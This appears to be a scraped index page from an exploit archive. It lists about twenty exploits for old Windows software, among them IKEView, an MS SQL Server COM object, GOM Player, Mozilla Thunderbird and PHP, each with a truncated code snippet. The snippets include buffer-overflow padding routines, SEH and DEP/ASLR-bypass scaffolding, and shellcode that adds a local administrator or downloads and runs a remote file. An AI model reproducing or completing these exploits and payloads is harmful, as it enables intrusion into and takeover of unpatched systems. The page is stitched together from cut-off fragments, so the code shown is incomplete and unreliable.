IKEView.exe R60 - .elg Local (SEH)

IKEView.exe R60 - .elg Local SEH Exploit Title: IKEView.exe R60 localSEH Exploit Date: 17/09/2015 Exploit Author: cor3sm4sh3r Author email: cor3sm4sh3ratgmail.com Contact: https://in.linkedin.com/pub/shravan-kumar-ceh-oscp/103/414/450 Category: Local + Gr337z: hyp3rlinx for finding the bug +...

MS SQL Server 2000/2005 SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit

No description provided by source. % Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoint, "0x", "" PackDWORD = PackDWORD & UnEscape"%...

MS SQL Server 20002005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer

MS SQL Server 20002005 - SQLNS.SQLNamespace COM Object Refresh Unhandled Pointer % Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoin...

MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer

% Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoint, "0x", "" PackDWORD = PackDWORD & UnEscape"%u" & MidstrTmp, 5, 2 & MidstrTmp, 7...

Free-MP3-CD-Ripper-1.1-DEP

Exploit Title: Free MP3 CD Ripper 1.1 Universal DEP Bypass Exploit Date: 27\08\2011 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version: 1.1 from struct import pack from time import sleep import os from sys import exit print ''' Created By C4SS!0...

Wav-Player-1.1.3.6-(.pll)

Open the wav player, make a playlist and save it. Then, close the player and run this exploit to create the new playlist. When you open again wav player, you will see the calc. fichero = open"wvplayer.pll", "w" print "+ Creating exploit .pll..." fichero.write"A"1034 Padding fichero.write"t%dA" he...

GOM-Player-2.1.33.5071-ASX-File-Unicode

Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. Version: 2.1.33.5071 Date: 30-11-2011 Author: Debasish Mandal Peter Van Eeckhoutte corelanc0d3r rawinput" Press Enter to generate the crafted ASX..." size = 2046 Shellcode WinExec "Calc.exe"...

Windows XP PRO SP3 - Full ROP calc shellcode

No description provided by source. / Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode Author: b33f http://www.fuzzysecurity.com/ Notes: This is probably not the most efficient way but I gave the dll's a run for their money ; Greets: Donato, Jahmel OS-DLL's used: Base | Top | Size | Version...

Mozilla Thunderbird DLL Hijacking Exploit (dwmapi.dll)

No description provided by source. / Exploit Title: Mozilla Thunderbird DLL Hijacking Exploit dwmapi.dll Date: 26/08/2010 Author: h4ck3r47 http://twitter.com/hxteam Version: Latest Mozilla Thunderbird 3.1.2 Tested on: Windows XP SP3 The code is based on the exploit from TheLeader Vulnerable...

PHP <= 4.4.6 ibase_connect() Local Buffer Overflow Exploit

No description provided by source. ?php // PHP = 4.4.6 ibaseconnect & ibasepconnect local buffer overflow // poc exploit // windows 2000 sp3 en / seh overwrite // by rgod // site: http://retrogod.altervista.org if !extensionloadedinterbase dieonly works with interbase extension ; $scode= \xeb\x1b...

Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes

No description provided by source. Title: Win32 Mini HardCode WinExec&ExitProcess Shellcode 16 bytes ;Test on xpsp2cn,no zero in shellcode,it will run write.exe ;--------------------------------------------- push 7C808E9DH ;write ;68 xx xx xx xx ;program string in memory push 7C81CAA2H ;exitproce...

DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit

No description provided by source. ?php / Title: DVD X Player 5.5 Pro DEP + ASLR Bypass Exploit Date: Sep 08, 2011 Author: Rew [email protected] Discovered by: Blake http://www.exploit-db.com/exploits/17788/ Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup.exe Tested on: WinXP Pro SP3 +...

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes

No description provided by source. / Title: win32/xp pro sp3 EN 32-bit - add new local administrator 113 bytes Author: Anastasios Monachos secuid0 - anastasiosmatgmaildotcom Method: Hardcoded opcodes kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa Tested on: WinXP Pro SP3 EN 32bit - Buil...

Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode

No description provided by source. / Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Date: 2013-22-01 Author: RubberDuck Web: http://bflow.security-portal.cz http://www.security-portal.cz Tested on: Win 2k, Win XP Home SP2/SP3 CZ 32, Win 7 32/64 -- file is downloaded from URL...

Wordtrainer 3.0 .ORD File Buffer Overflow Vulnerability

No description provided by source. !/usr/bin/python +Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability +Date: 12\04\2011 +Author: C4SS!0 G0M3S +Software Link: http://www.wordtrainer.net/software/files/wt307shwexe/wt307shw.exe +Version: 3.0 +Tested On: WIN-XP SP3 Brazilian...

Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow

No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...

Mocha LPD 1.9 - Remote Buffer Overflow DoS PoC

No description provided by source. !/usr/bin/python Mocha LPD v1.9 Remote Heap Overflow Exploit ol skool 'write 4' whoops, I said it was a DoS. My bad. btw yes, I know its 2010 :0 CVE: 2010-1687 tested on XP sp1 use anti debugging to see it work - !hidedebug zwqueryinformationprocess call trace:...

MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)

No description provided by source. !/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...

PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit

No description provided by source. ?php errorreporting0; PHP 6.0 Dev strtransliterate 0Day Buffer Overflow Exploit Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev Buffer Overflow Bug discovered by Pr0T3cT10n, [email protected] Exploited by TheLeader, Debug SP. Thanks: HDM...

Adobe Acrobat ActiveX Control 1.3.188 ActiveX Buffer Overflow

No description provided by source. source: http://www.securityfocus.com/bid/666/info There is a buffer overflow in the 1.3.188 version of the Adobe Acrobat ActiveX control pdf.ocx that ships with Acrobat Viewer 4.0. This ActiveX control is marked 'Safe for Scripting' within Internet Explorer 4.X...